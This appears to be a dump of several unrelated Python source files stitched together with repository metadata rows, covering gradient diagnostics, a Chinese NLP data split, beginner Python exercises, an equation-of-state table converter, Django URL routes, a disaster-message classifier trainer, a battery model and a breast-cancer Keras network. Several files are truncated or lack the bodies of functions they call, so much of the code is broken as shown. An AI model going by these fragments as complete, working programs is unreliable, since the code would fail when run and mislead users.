grad_var_sqrt = grads_variance.pow(0.5)
clipped_variance_sqrt = grad_var_sqrt.clamp(min=eps)
grads_snr = grads_mean.abs() / (clipped_variance_sqrt)
# compute DSNR, see `tighter variational bounds are not necessarily better` (eq. 12)
if compute_dsnr:
u = all_grads.mean(0, keepdim=True)
u /= u.norm(dim=1, keepdim=True, p=2)
g_parallel = u * (u * all_grads).sum(1, keepdim=True)
g_perpendicular = all_grads - g_parallel
grads_dsnr = g_parallel.norm(dim=1, p=2) / (eps + g_perpendicular.norm(dim=1, p=2))
# compute grad direction: cosine similarity between the gradient estimate and the oracle
if oracle_grad is not None:
grads_dir = cosine(grads_mean, oracle_grad, dim=-1)
# reinitialize grads
model.zero_grad()
# reduce fn: keep only parameter with variance > 0
mask = (grads_variance > eps).float()
_reduce = lambda x: (x * mask).sum() / mask.sum()
output = Diagnostic({'grads': {
'variance': _reduce(grads_variance),
'magnitude': _reduce(grads_mean.abs()),
'snr': _reduce(grads_snr),
'dsnr': grads_dsnr.mean() if grads_dsnr is not None else 0.,
'keep_ratio': mask.sum() / torch.ones_like(mask).sum()
},
'snr': {
'p25': percentile(grads_snr, q=0.25), 'p50': percentile(grads_snr, q=0.50),
'p75': percentile(grads_snr, q=0.75), 'p5': percentile(grads_snr, q=0.05),
'p95': percentile(grads_snr, q=0.95), 'min': grads_snr.min(),
'max': grads_snr.max(), 'mean': grads_snr.mean()}
})
if oracle_grad is not None:
output['grads']['direction'] = grads_dir.mean()
# additional data: raw grads, and mean,var,snr for each parameter separately
meta = {
'grads': all_grads,
'expected': grads_mean,
'magnitude': grads_mean.abs(),
'var': grads_variance,
'snr': grads_snr,
}
return output, meta
| 42.545064 | 125 | 0.611924 |
904a907ab750687eb1de030da0541431f23b5d88 | 1,081 | py | Python | Sem-09-T1-Q5.py | daianasousa/Semana-09 | decfc9b47931ae4f5a4f30a0d26b931ecd548f59 | [
"MIT"
] | null | null | null | Sem-09-T1-Q5.py | daianasousa/Semana-09 | decfc9b47931ae4f5a4f30a0d26b931ecd548f59 | [
"MIT"
] | null | null | null | Sem-09-T1-Q5.py | daianasousa/Semana-09 | decfc9b47931ae4f5a4f30a0d26b931ecd548f59 | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
main() | 30.885714 | 138 | 0.543941 |
5f3a8ec38dd614e2783df50d617c5b8f3ca8b0f8 | 1,428 | py | Python | data_split.py | CodeDogandCat/ChineseGrammarErrorDiagnose | 4e1ec745ae938f742c6afb0e88b08ea50c6028cb | [
"Apache-2.0"
] | null | null | null | data_split.py | CodeDogandCat/ChineseGrammarErrorDiagnose | 4e1ec745ae938f742c6afb0e88b08ea50c6028cb | [
"Apache-2.0"
] | null | null | null | data_split.py | CodeDogandCat/ChineseGrammarErrorDiagnose | 4e1ec745ae938f742c6afb0e88b08ea50c6028cb | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import re
# from pyltp import Segmentor
import jieba.posseg as pseg
import jieba
import os
import sys
import json
import math
# import kenlm
import nltk
from collections import Counter
# dataSplit('TNewsSegafter2.txt', 32)
dataSplit('TNewsSegafter1.txt', 32)
| 28 | 81 | 0.621148 |
5f3bba72b50ee67716dbeda71e53db5b079da28f | 2,435 | py | Python | Code/Python/pract_fund1_sol.py | kunal-mulki/Materials | b76bba123002972e4063b9b24cd5dc3d980e16e9 | [
"MIT"
] | 27 | 2016-12-07T17:38:41.000Z | 2021-06-28T06:19:49.000Z | Code/Python/pract_fund1_sol.py | kunal-mulki/Materials | b76bba123002972e4063b9b24cd5dc3d980e16e9 | [
"MIT"
] | 27 | 2016-05-28T21:32:24.000Z | 2016-12-08T16:47:09.000Z | Code/Python/pract_fund1_sol.py | NYUDataBootcamp/Materials | b76bba123002972e4063b9b24cd5dc3d980e16e9 | [
"MIT"
] | 50 | 2016-10-12T11:04:50.000Z | 2021-06-01T23:24:45.000Z | """
Practice problems, Python fundamentals 1 -- Solutions
@authors: Balint Szoke, Daniel Csaba
@date: 06/02/2017
"""
#-------------------------------------------------------
# 1) Solution
good_string = "Sarah's code"
#or
good_string = """Sarah's code"""
#-------------------------------------------------------
# 2) Solution
i = 1234
list(str(i))
#-------------------------------------------------------
# 3) Solution
year = '2016'
next_year = str(int(year) + 1)
#-------------------------------------------------------
# 4) Solution
x, y = 3, 'hello'
print(x, y)
z = x
x = y
y = z
print(x, y)
#-------------------------------------------------------
# 5) Solution
name = 'Jones'
print(name.upper())
#-------------------------------------------------------
# 6) Solution
name = 'Ulysses'
print(name.count('s'))
#-------------------------------------------------------
# 7) Solution
long_string = 'salamandroid'
long_string = long_string.replace('a', '*')
print(long_string)
#-------------------------------------------------------
# 8) Solution
ll = [1, 2, 3, 4, 5]
ll.reverse()
print(ll)
#ll.pop(1)
# or better
ll.pop(ll.index(4))
print(ll)
ll.append(1.5)
print(ll)
ll.sort()
print(ll)
#%% #-------------------------------------------------------
# 9) Solution
number = "32,054.23"
number_no_comma = number.replace(',', '')
number_float = float(number_no_comma)
print(number_float)
#or
print(float(number.replace(',', '')))
#-------------------------------------------------------
# 10) Solution
firstname_lastname = 'john_doe'
firstname, lastname = firstname_lastname.split('_')
Firstname = firstname.capitalize()
Lastname = lastname.capitalize()
print(Firstname, Lastname)
#-------------------------------------------------------
# 11-12) Solution
l = [0, 1, 2, 4, 5]
index = l.index(4)
l.insert(index, 3)
print(l)
#-------------------------------------------------------
# 13) Solution
s = 'www.example.com'
s = s.lstrip('w.')
s = s.rstrip('.c')
# or in a single line
(s.lstrip('w.')).rstrip('.com')
#-------------------------------------------------------
# 14) Solution
link = 'https://play.spotify.com/collection/albums'
splitted_link = link.rsplit('/', 1)
print(splitted_link[0])
#or
link.rsplit('/', 1)[0]
#-------------------------------------------------------
# 15) Solution
amount = "32.054,23"
ms = amount.maketrans(',.', '.,')
amount = amount.translate(ms)
print(amount)
| 21.936937 | 62 | 0.433265 |
5f3df5f78e78d0ee2fc42ec4cf3a85208b508f67 | 7,178 | py | Python | eos/old_scott_ANEOS_conversion.py | ScottHull/FDPS_SPH | 6db11d599d433f889da100e78c17d6f65365ceda | [
"MIT"
] | null | null | null | eos/old_scott_ANEOS_conversion.py | ScottHull/FDPS_SPH | 6db11d599d433f889da100e78c17d6f65365ceda | [
"MIT"
] | null | null | null | eos/old_scott_ANEOS_conversion.py | ScottHull/FDPS_SPH | 6db11d599d433f889da100e78c17d6f65365ceda | [
"MIT"
] | null | null | null | """
This is a python script that converts u(rho, T), P(rho, T), Cs(rho,T), S(rho, T)
to T(rho, u), P(rho, u), Cs(rho, u), S(rho, u), which is more useful for SPH calculations
"""
import matplotlib.pyplot as plt
from collections import OrderedDict
import numpy as np
import pandas as pd
import csv
import sys
from scipy.interpolate import interp1d
from scipy import interpolate
def recalculateEnergies(d, grid_number, min_energy, delta):
"""
For each density sample, we want the same exponential energy grid
:param d:
:param grid_number:
:param min_energy:
:param delta:
:return:
"""
densities = d.keys()
new_energies = []
for i in range(0, grid_number):
new_energy = min_energy * (delta**i)
new_energies.append(new_energy)
for i in densities:
d[i].update({'Energy (J/kg)': new_energies})
return d
nu = 120 # number of the grid for the internal energy (exponential)
infile_path = 'granite.table.csv'
empty_lines = emptyLineIndices(f=infile_path)
sorted_dict = chunkFile(f=infile_path, emtpy_lines=empty_lines)
densities = sorted_dict.keys()
infile_df = pd.read_csv(infile_path)
energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])]
min_energy = min(energy)
max_energy = max(energy)
delta = (min_energy / max_energy)**(1/(nu-1))
sorted_dict = recalculateEnergies(d=sorted_dict, grid_number=nu, min_energy=min_energy, delta=delta)
for i in densities:
energies = sorted_dict[i]['Energy (J/kg)']
temperatures = sorted_dict[i]['Temperature (K)']
pressures = sorted_dict[i]['Pressure (Pa)']
sound_speeds = sorted_dict[i]['Sound speed (m/s)']
entropies = sorted_dict[i]['Entropy (J/kg/K)']
f_temperature = interpolate.interp1d(energies, temperatures, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Temperature (K)': f_temperature(energies)})
f_pressure = interpolate.interp1d(temperatures, pressures, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Pressure (Pa)': f_pressure(sorted_dict[i]['Temperature (K)'])})
f_soundspeed = interpolate.interp1d(temperatures, sound_speeds, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Sound speed (m/s)': f_soundspeed(sorted_dict[i]['Temperature (K)'])})
f_entropy = interpolate.interp1d(temperatures, entropies, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Entropy (J/kg/K)': f_entropy(sorted_dict[i]['Temperature (K)'])})
# infile_df = pd.read_csv(infile_path)
#
# density = sorted(list(set([reformat(i) for i in list(infile_df['Density (kg/m3)'])]))) # remove duplicates, then sort
# temperature = sorted(list(set([reformat(i) for i in list(infile_df['Temperature (K)'])])))
# energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])]
# pressure = [reformat(i) for i in list(infile_df['Pressure (Pa)'])]
# sound_speed = [reformat(i) for i in list(infile_df['Sound speed (m/s)'])]
# entropy = [reformat(i) for i in list(infile_df['Entropy (J/kg/K)'])]
#
# min_energy = min(energy)
# max_energy = max(energy)
# delta = (min_energy / max_energy)**(1 / (nu - 1))
#
# new_energy = [min_energy * (delta**i) for i in range(0, nu)]
#
# new_temperature = []
# new_pressure = []
# new_sound_speed = []
# new_entropy = []
#
# for m in range(0, nu):
#
# # internal energy
# f_temperature = interpolate.interp1d(energy[m:], temperature[m:], kind='linear', fill_value='extrapolate')
# new_temperature.append(f_temperature(new_energy))
#
# # pressure
# f_pressure = interpolate.interp1d(temperature[m:], pressure[m:], kind='linear', fill_value='extrapolate')
# new_pressure.append(f_pressure(new_temperature[m]))
#
# # sound speed
# f_soundspeed = interpolate.interp1d(temperature[m:], sound_speed[m:], kind='linear', fill_value='extrapolate')
# new_sound_speed.append(f_soundspeed(new_temperature[m]))
#
# # entropy
# f_entropy = interpolate.interp1d(temperature[m:], entropy[m:], kind='linear', fill_value='extrapolate')
# new_entropy.append(f_entropy(new_temperature[m]))
#
# new_temperature = np.array(new_temperature)
# new_pressure = np.array(new_pressure)
# new_sound_speed = np.array(new_sound_speed)
# new_entropy = np.array(new_entropy)
#
# for m in range(0, len(density), int(len(density)/6)):
#
# ax = [0, 0, 0, 0]
#
# fig = plt.figure(figsize = (10,6.128))
#
# ax[0] = fig.add_subplot(221)
# ax[1] = fig.add_subplot(222)
# ax[2] = fig.add_subplot(223)
# ax[3] = fig.add_subplot(224)
#
# ax[0].semilogy(np.array(temperature) * 1e-3, np.array(energy[m:]) * 1e-6, '--', label="original ANEOS")
# ax[0].semilogy(new_temperature[m:] * 1e-3, np.array(new_energy[m:]) * 1e-6, '-.', label="modified")
# ax[1].semilogy(np.array(temperature) * 1e-3, np.array(pressure[m:]) * 1e-6,'--', new_temperature[m:] * 1e-3, new_pressure[m:] * 1e-6,'-.')
# ax[2].plot(np.array(temperature) * 1e-3, np.array(sound_speed[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_sound_speed[m:] * 1e-3,'-.')
# ax[3].plot(np.array(temperature) * 1e-3, np.array(entropy[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_entropy[m:] * 1e-3,'-.')
#
# ax[0].legend(frameon=False)
#
# ax[0].set_ylabel('Energy (MJ/kg)', fontsize=10)
# ax[1].set_ylabel('Pressure (MPa)', fontsize=10)
# ax[2].set_ylabel('Sound Speed (km/s)', fontsize=10)
# ax[3].set_ylabel('Entropy (kJ/K/kg)', fontsize=10)
# ax[2].set_xlabel('Temperature ($10^3$ K)', fontsize=10)
# ax[3].set_xlabel('Temperature ($10^3$ K)',fontsize=10)
#
# fig.suptitle("Density: %3.3f kg/m$^3$" %(density[m]))
# # plt.show()
# # fig.savefig("Density" + str(m) + ".png")
| 34.344498 | 146 | 0.636389 |
5f3f44af77a5d9949e7fe7c6858624af3b7fa923 | 346 | py | Python | scheduler/post_scheduler/urls.py | Awinja-j/Social-Media-post-Scheduler | 4f95b4bb2ca3f890d3e22bcda859b94ebc483b87 | [
"MIT"
] | 1 | 2021-05-08T08:21:06.000Z | 2021-05-08T08:21:06.000Z | scheduler/post_scheduler/urls.py | Awinja-j/Social-Media-post-Scheduler | 4f95b4bb2ca3f890d3e22bcda859b94ebc483b87 | [
"MIT"
] | null | null | null | scheduler/post_scheduler/urls.py | Awinja-j/Social-Media-post-Scheduler | 4f95b4bb2ca3f890d3e22bcda859b94ebc483b87 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('post_posts', views.post_posts),
path('fetch_posts', views.get_posts),
path('fetch_post/<pk>', views.get_post),
path('delete_post/<pk>', views.delete_post),
path('edit_post/<pk>', views.edit_post),
path('search_for_a_post', views.search_for_a_post)
] | 28.833333 | 54 | 0.699422 |
5f3fad78b868dac1b90ecb78a5594353e0e31396 | 506 | py | Python | dato-graphlab/src/config.py | warreee/apache-flink_vs_dato-graphlab | cd01cee208461479d3f27489ab45df439b8b9820 | [
"Apache-2.0"
] | null | null | null | dato-graphlab/src/config.py | warreee/apache-flink_vs_dato-graphlab | cd01cee208461479d3f27489ab45df439b8b9820 | [
"Apache-2.0"
] | null | null | null | dato-graphlab/src/config.py | warreee/apache-flink_vs_dato-graphlab | cd01cee208461479d3f27489ab45df439b8b9820 | [
"Apache-2.0"
] | null | null | null | import os
| 16.322581 | 63 | 0.666008 |
5f42caff296a8e9070523febb1d633e533ecbfff | 950 | py | Python | tools.py | chougousui/keyboard_layout_for_mobile | 3bb59169f10ac56fb82cb62be07f821f1ecac22e | [
"MIT"
] | 5 | 2019-06-12T09:29:06.000Z | 2020-12-31T08:53:19.000Z | tools.py | chougousui/keyboard_layout_for_mobile | 3bb59169f10ac56fb82cb62be07f821f1ecac22e | [
"MIT"
] | null | null | null | tools.py | chougousui/keyboard_layout_for_mobile | 3bb59169f10ac56fb82cb62be07f821f1ecac22e | [
"MIT"
] | null | null | null | import numpy as np
| 29.6875 | 119 | 0.489474 |
5f43a06d91c00b879b94bd9ca11de4d7d8fcab07 | 377 | py | Python | full-stack/backend/django-app/django-jwt-app/settings/urls.py | mp5maker/library | b4d2eea70ae0da9d917285569031edfb4d8ab9fc | [
"MIT"
] | null | null | null | full-stack/backend/django-app/django-jwt-app/settings/urls.py | mp5maker/library | b4d2eea70ae0da9d917285569031edfb4d8ab9fc | [
"MIT"
] | 23 | 2020-08-15T15:18:32.000Z | 2022-02-26T13:49:05.000Z | full-stack/backend/django-app/django-jwt-app/settings/urls.py | mp5maker/library | b4d2eea70ae0da9d917285569031edfb4d8ab9fc | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path, include
from rest_framework_jwt.views import (
obtain_jwt_token,
refresh_jwt_token,
)
urlpatterns = [
path('admin/', admin.site.urls),
path('token-auth/', obtain_jwt_token),
path('token-refresh/', refresh_jwt_token),
path('employee/', include('employee.urls', namespace='employee'))
]
| 22.176471 | 70 | 0.710875 |
5f45037068a6ca19658fc2ba430b609e4386fc29 | 15,989 | py | Python | models/train_classifier.py | tarcisobraz/disaster-message-clf | 22de03350a0f993005564a1d07a43da6bd989e67 | [
"DOC"
] | null | null | null | models/train_classifier.py | tarcisobraz/disaster-message-clf | 22de03350a0f993005564a1d07a43da6bd989e67 | [
"DOC"
] | null | null | null | models/train_classifier.py | tarcisobraz/disaster-message-clf | 22de03350a0f993005564a1d07a43da6bd989e67 | [
"DOC"
] | null | null | null | #General libs
import sys
import os
import json
from datetime import datetime
import time
#Data wrangling libs
import pandas as pd
import numpy as np
#DB related libs
from sqlalchemy import create_engine
#ML models related libs
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics import classification_report
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import LogisticRegression
#Gensim
from gensim.models import KeyedVectors
#Custom Transformers and Estimators
import nlp_estimators
#Model Saver
import dill
#Workspace Utils
from workspace_utils import active_session
#Glove Models dictionary (to be filled in when needed)
glove_models_by_size = {50: None,
100: None,
300: None}
#Train Configurations to be filled in when script is called
train_configs = {}
def get_or_load_glove_model(num_dims):
'''
INPUT
num_dims - int, number of dimensions of the Glove model to be loaded
OUTPUT
glove_model - object, the pre-trained glove model with the specified number of dimensions
This function either retrieves the already-stored glove model or loads and
stores it from file using the train configuration `glove_models_folderpath`
'''
if glove_models_by_size[num_dims] == None:
print('Pre-trained Glove Model with {} dims not found. '\
'\nLoading it from file...'.format(num_dims))
glove_models_by_size[num_dims] = KeyedVectors.load_word2vec_format(
os.path.join(train_configs['glove_models_folderpath'],
'glove.6B.{}d_word2vec.txt'.format(num_dims)),
binary=False)
return glove_models_by_size[num_dims]
def load_data(database_filepath):
'''
INPUT
database_filepath - string, filepath of database from which data will be loaded
OUTPUT
X - numpy array, The raw messages ready to be used to train the pipelines
X_tokenized - numpy array, The tokenized messages ready to be used to train the pipelines
Y - numpy array, The list of categories to which each message belongs
category_columns - pandas series, The names of the categories
categories_tokens - numpy array, The tokenized categories names (to be used by cats_sim feature set)
This function loads and prepares data for the models training
'''
engine = create_engine('sqlite:///' + database_filepath)
messages_df = pd.read_sql_table(con=engine, table_name='Message')
categories_df = pd.read_sql_table(con=engine, table_name='CorpusWide')
messages_tokens = pd.read_sql_table(con=engine, table_name='MessageTokens')
X = messages_df.message.values
X_tokenized = messages_tokens.tokens_str.values
Y_df = categories_df.drop(['message_id', 'message', 'original', 'genre'], axis=1)
Y = Y_df.values
category_columns = Y_df.columns
categories_tokens = np.array([np.array(cat.split('_')) for cat in category_columns])
return X, X_tokenized, Y, category_columns, categories_tokens
def build_estimator_obj(estimator_code):
'''
INPUT
estimator_code - string, the code of the classifier object to be built
OUTPUT
classifier_obj - sklearn estimator, the built classifier object
This function builds a classifier object based on the estimator code received as input.
For unexpected codes, it prints an error and exits the script execution
'''
classifier_obj = None
if estimator_code == 'rf':
classifier_obj = RandomForestClassifier()
elif estimator_code == 'lr':
classifier_obj = LogisticRegression()
else:
print("Invalid Classifier Estimator Code " + estimator_code)
exit(1)
return classifier_obj
def build_classifiers_build_params(classifiers_configs):
'''
INPUT
classifiers_configs - dict, a dictionary containing the configuration for each classifier
OUTPUT
classifiers_params_dict - dict, a dictionary containing the grid params to be used for
each classifier in the training process
This function builds a dictionary with grid params to be used in training process for each
classifier whose configurations were given as input.
It can handle a single classifier or a list of classifiers.
'''
if len(classifiers_configs) > 1:
classifiers_params_list = []
classifiers_params_dict = {}
for classifier in classifiers_configs:
classifier_estimator = classifier['estimator']
classifier_obj = build_estimator_obj(classifier_estimator)
classifier_obj = MultiOutputClassifier(classifier_obj.set_params(**classifier['params']))
classifiers_params_list.append(classifier_obj)
classifiers_params_dict['clf'] = classifiers_params_list
elif len(classifiers_configs) == 1:
classifier = classifiers_configs[0]
classifier_estimator = classifier['estimator']
classifier_obj = build_estimator_obj(classifier_estimator)
classifier_obj = MultiOutputClassifier(classifier_obj)
classifiers_params_dict = {'clf' : [classifier_obj]}
classifiers_params_dict.update(classifier['params'])
print(classifiers_params_dict)
return classifiers_params_dict
def build_model(model_config,classifiers_params,categories_tokens):
'''
INPUT
model_config - dict, a dictionary containing the configuration for a model pipeline
classifiers_configs - dict, a dictionary containing the configuration for each classifier
categories_tokens - numpy array, array containing the tokenized categories names
OUTPUT
grid_search_cv - sklearn GridSearchCV, a grid search CV object containing specifications
on how to train the model based on the input configs
This function builds a Grid Search CV object with specifications for training process for a
given model and its classifiers whose configurations were given as input.
It can handle different feature_sets:
- Local Word2Vec
- Pre-Trained Glove
- Doc2Vec
- Category Similarity
- All Features Sets together
'''
feature_set = model_config['feature_set']
print("Building Model for feature set: {}".format(feature_set))
print("Grid Params: {}".format(model_config['grid_params']))
pipeline = grid_search_params = grid_search_cv = None
jobs = -1
score = 'f1_micro'
def_cv = 3
verbosity_level=10
if feature_set == 'local_w2v':
pipeline = Pipeline([
('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer()),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
elif feature_set == 'glove':
pipeline = Pipeline([
('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer(
get_or_load_glove_model(50))),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = {'glove__word2vec_model' :
[get_or_load_glove_model(num_dims) for num_dims in
model_config['grid_params']['glove__num_dims']]}
elif feature_set == 'doc2vec':
pipeline = Pipeline([
('doc2vec', nlp_estimators.Doc2VecTransformer()),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
elif feature_set == 'cats_sim':
pipeline = Pipeline([
('cats_sim', nlp_estimators.CategoriesSimilarity(
categories_tokens=categories_tokens)),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = {'cats_sim__word2vec_model' :
[get_or_load_glove_model(num_dims) for num_dims in
model_config['grid_params']['cats_sim__num_dims']]}
elif feature_set == 'all_feats':
pipeline = Pipeline([
('features', FeatureUnion([
('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer(num_dims=50)),
('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer(
get_or_load_glove_model(50)
)),
('doc2vec', nlp_estimators.Doc2VecTransformer(vector_size=50)),
('cats_sim', nlp_estimators.CategoriesSimilarity(categories_tokens=categories_tokens,
word2vec_model=get_or_load_glove_model(50)))
])),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
else:
print("Error: Invalid Feature Set: " + feature_set)
sys.exit(1)
# Adds classifiers params to grid params
grid_search_params.update(classifiers_params)
grid_search_cv = GridSearchCV(estimator=pipeline,
param_grid=grid_search_params,
scoring=score,
cv=def_cv,
n_jobs=jobs,
verbose=verbosity_level)
return grid_search_cv
def evaluate_model(model, X_test, Y_test, category_names):
'''
INPUT
model - sklearn GridSearchCV, the GridSearch containing the model with best performance on the training set
X_test - numpy array, tokenized messages ready to be used to test the fit pipelines
Y_test - numpy array, array containing the tokenized categories names for the test set
category_names - pandas series, the categories names
OUTPUT
test_score - float, the score of the input model on the test data
This function runs the model with best performance on the training set on the test dataset,
printing the precision, recall and f-1 per category and returning the overall prediction score.
'''
print('Best params: %s' % model.best_params_)
# Best training data accuracy
print('Best training score: %.3f' % model.best_score_)
# Predict on test data with best params
Y_pred = model.predict(X_test)
test_score = model.score(X_test, Y_test)
# Test data accuracy of model with best params
print('Test set score for best params: %.3f ' % test_score)
for category_idx in range(len(category_names)):
print(classification_report(y_pred=Y_pred[:,category_idx],
y_true=Y_test[:,category_idx],
labels=[0,1],
target_names=[category_names[category_idx] + '-0',
category_names[category_idx] + '-1']))
return test_score
def save_model(model, model_filepath):
'''
INPUT
model - sklearn Estimator, the model with best performance on the training set
model_filepath - string, path where model picke will be saved
This function saves the model with best performance on the training set to a given filepath.
'''
# Output a pickle file for the model
with open(model_filepath,'wb') as f:
dill.dump(model, f)
def build_grid_search_results_df(gs_results, gs_name, test_score):
'''
INPUT
gs_results - dict, dictionary containing the results of GridSearchCV training
gs_name - string, the name of the GridSearchCV feature set
test_score - float, the score of the best performing model of the GridSearchCV on the test set
OUTPUT
gs_results_df - pandas DataFrame, a dataframe holding information of the GridSearchCV results
(train and test) for record
This function builds a dataframe with information of the GridSearchCV results
(train and test) for record.
'''
gs_results_df = pd.DataFrame(gs_results)
gs_results_df['grid_id'] = gs_name
gs_results_df['best_model_test_score'] = test_score
gs_results_df['param_set_order'] = np.arange(len(gs_results_df))
return gs_results_df
def run_grid_search():
'''
This function runs the whole model selection phase:
- Load Data from DB
- Build Model
- Run GridSearch
- Save results to file
- Save best model pickle file
'''
start = time.time()
print("Train configuration:")
print(json.dumps(train_configs, indent=4))
print('Loading data...\n DATABASE: {}'.format(train_configs['database_filepath']))
X, X_tokenized, Y, category_names, categories_tokens = load_data(train_configs['database_filepath'])
X_train, X_test, Y_train, Y_test = train_test_split(X_tokenized, Y, test_size=0.25)
classifiers_params = build_classifiers_build_params(train_configs['classifiers'])
print('Running GridSearch on models parameters...')
best_score = 0.0
best_gs = ''
overall_results_df = pd.DataFrame()
for model_config in train_configs['models']:
print('Building model...')
model = build_model(model_config,
classifiers_params,
categories_tokens)
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
test_score = evaluate_model(model, X_test, Y_test, category_names)
gs_results_df = build_grid_search_results_df(model.cv_results_,
model_config['feature_set'],
test_score)
overall_results_df = pd.concat([overall_results_df, gs_results_df])
print('Saving model...\n MODEL: {}'.format(
model_config['model_ouput_filepath']))
save_model(model.best_estimator_, model_config['model_ouput_filepath'])
print('Trained model saved!')
# Track best (highest test accuracy) model
if test_score > best_score:
best_score = test_score
best_gs = model_config['feature_set']
output_filepath = train_configs['results_folderpath'] + \
'res-' + train_configs['name'] + '-' + \
datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + \
'.csv'
print('Saving Results...\n FILEPATH: {}'.format(output_filepath))
overall_results_df.to_csv(output_filepath, index=False)
print('\nClassifier with best test set accuracy: %s' % best_gs)
end = time.time()
print("Training Time: " + str(int(end - start)) + "s")
if __name__ == '__main__':
main()
| 37.888626 | 117 | 0.659704 |
5f468ef647d08df9b7e435bbbbaaf01ef4277cf4 | 148 | py | Python | src/cortexpy/test/constants.py | karljohanw/cortexpy | 70dcce771136f98edb5250ad8abd2a46bda7f0a6 | [
"Apache-2.0"
] | 2 | 2020-04-08T15:31:12.000Z | 2020-07-01T11:04:47.000Z | src/cortexpy/test/constants.py | karljohanw/cortexpy | 70dcce771136f98edb5250ad8abd2a46bda7f0a6 | [
"Apache-2.0"
] | 9 | 2018-09-12T09:29:43.000Z | 2020-03-15T09:11:25.000Z | src/cortexpy/test/constants.py | karljohanw/cortexpy | 70dcce771136f98edb5250ad8abd2a46bda7f0a6 | [
"Apache-2.0"
] | 1 | 2019-03-29T10:59:13.000Z | 2019-03-29T10:59:13.000Z | import struct
MAX_UINT = 2 ** (struct.calcsize('I') * 8) - 1
MAX_ULONG = 2 ** (struct.calcsize('L') * 8) - 1
UINT8_T = 1
UINT32_T = 4
UINT64_T = 8
| 18.5 | 47 | 0.614865 |
5f47bfe261a0653163329656400b45e38dc2e334 | 2,103 | py | Python | tests/functional_tests/authors/test_authors_login.py | Kaique425/recipes | ab188dbe1ca3891160f65a7858613b8750faa721 | [
"MIT"
] | null | null | null | tests/functional_tests/authors/test_authors_login.py | Kaique425/recipes | ab188dbe1ca3891160f65a7858613b8750faa721 | [
"MIT"
] | null | null | null | tests/functional_tests/authors/test_authors_login.py | Kaique425/recipes | ab188dbe1ca3891160f65a7858613b8750faa721 | [
"MIT"
] | null | null | null | import pytest
from django.contrib.auth.models import User
from django.urls import reverse
from selenium.webdriver.common.by import By
from .base import AuthorBaseFunctionalTest
| 37.553571 | 85 | 0.661912 |
5f4b11817e6c6f5664fb7eebcff8bd3df9ed5773 | 42 | py | Python | varex/__init__.py | weiyi-bitw/varex | 765e8876c0ced480a47c0e523736bd31b7897644 | [
"MIT"
] | null | null | null | varex/__init__.py | weiyi-bitw/varex | 765e8876c0ced480a47c0e523736bd31b7897644 | [
"MIT"
] | null | null | null | varex/__init__.py | weiyi-bitw/varex | 765e8876c0ced480a47c0e523736bd31b7897644 | [
"MIT"
] | null | null | null | from .commons import VCFEntry, LabeledMat
| 21 | 41 | 0.833333 |
5f4ba7ea00a9b4ae2bec68e16163449e185187d1 | 2,612 | py | Python | simulation/battery/base_battery.py | BillMakwae/Simulation | 8d0ec274643f23bc0e78c96e50508b60791c11d2 | [
"MIT"
] | 8 | 2020-03-29T01:44:16.000Z | 2022-03-26T23:15:34.000Z | simulation/battery/base_battery.py | BillMakwae/Simulation | 8d0ec274643f23bc0e78c96e50508b60791c11d2 | [
"MIT"
] | 60 | 2020-02-08T22:07:16.000Z | 2022-03-26T23:51:55.000Z | simulation/battery/base_battery.py | BillMakwae/Simulation | 8d0ec274643f23bc0e78c96e50508b60791c11d2 | [
"MIT"
] | 1 | 2021-10-20T20:07:06.000Z | 2021-10-20T20:07:06.000Z | from simulation.common import Storage
from simulation.common import BatteryEmptyError
| 39.575758 | 116 | 0.61562 |
5f501af017d1618fd9d8ac7f58bef0af07c22038 | 2,757 | py | Python | MLP/Detectar cancer de mama/Cancer_mama_simples.py | alex7alves/Deep-Learning | 7843629d5367f3ea8b15915a7ba3667cf7a65587 | [
"Apache-2.0"
] | null | null | null | MLP/Detectar cancer de mama/Cancer_mama_simples.py | alex7alves/Deep-Learning | 7843629d5367f3ea8b15915a7ba3667cf7a65587 | [
"Apache-2.0"
] | null | null | null | MLP/Detectar cancer de mama/Cancer_mama_simples.py | alex7alves/Deep-Learning | 7843629d5367f3ea8b15915a7ba3667cf7a65587 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 21:04:48 2018
@author: Alex Alves
Programa para determinar se um tumor de mama
benigno (saida 0) ou maligno (saida 1)
"""
import pandas as pa
# Importao para poder dividir os dados entre treinamento da rede e testes de validao
from sklearn.model_selection import train_test_split
import keras
from keras.models import Sequential
from keras.layers import Dense
from sklearn.metrics import confusion_matrix, accuracy_score
entrada = pa.read_csv('entradas-breast.csv')
esperado = pa.read_csv('saidas-breast.csv')
# Treinamento com 75% e validao com 25%
entrada_treinar, entrada_teste, esperado_treinar,esperado_teste =train_test_split(entrada,esperado,test_size=0.25)
# Criando a rede neural
detectar_cancer = Sequential()
#Adicionando camada de entrada
